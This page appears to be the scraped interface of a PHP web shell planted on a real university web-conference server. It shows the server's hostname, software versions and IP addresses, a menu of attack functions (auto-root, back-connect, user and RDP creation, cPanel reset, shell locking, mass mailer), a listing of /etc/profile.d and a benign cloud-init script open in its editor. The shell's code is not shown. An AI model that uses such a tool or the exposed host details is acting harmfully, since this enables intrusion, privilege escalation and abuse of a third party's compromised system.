Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.218.27.145
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
profile.d /
[ HOME SHELL ]
Name
Size
Permission
Action
01-locale-fix.sh
96
B
-rw-r--r--
Z97-byobu.sh
1.52
KB
-rw-r--r--
Z99-cloud-locale-test.sh
3.34
KB
-rwxr-xr-x
Z99-cloudinit-warnings.sh
873
B
-rwxr-xr-x
apps-bin-path.sh
835
B
-rw-r--r--
bash_completion.sh
729
B
-rw-r--r--
cedilla-portuguese.sh
1003
B
-rw-r--r--
gawk.csh
1.08
KB
-rw-r--r--
gawk.sh
757
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Z99-cloudinit-warnings.sh
#!/bin/sh # This file is part of cloud-init. See LICENSE file for license information. # Purpose: show user warnings on login. cloud_init_warnings() { command -v local >/dev/null && local _local="local" || typeset _local="typeset" $_local warning="" idir="/var/lib/cloud/instance" n=0 $_local warndir="$idir/warnings" $_local ufile="$HOME/.cloud-warnings.skip" sfile="$warndir/.skip" [ -d "$warndir" ] || return 0 [ ! -f "$ufile" ] || return 0 [ ! -f "$sfile" ] || return 0 for warning in "$warndir"/*; do [ -f "$warning" ] || continue cat "$warning" n=$((n+1)) done [ $n -eq 0 ] && return 0 echo "" echo "Disable the warnings above by:" echo " touch $ufile" echo "or" echo " touch $sfile" } cloud_init_warnings 1>&2 unset cloud_init_warnings # vi: syntax=sh ts=4 expandtab
Close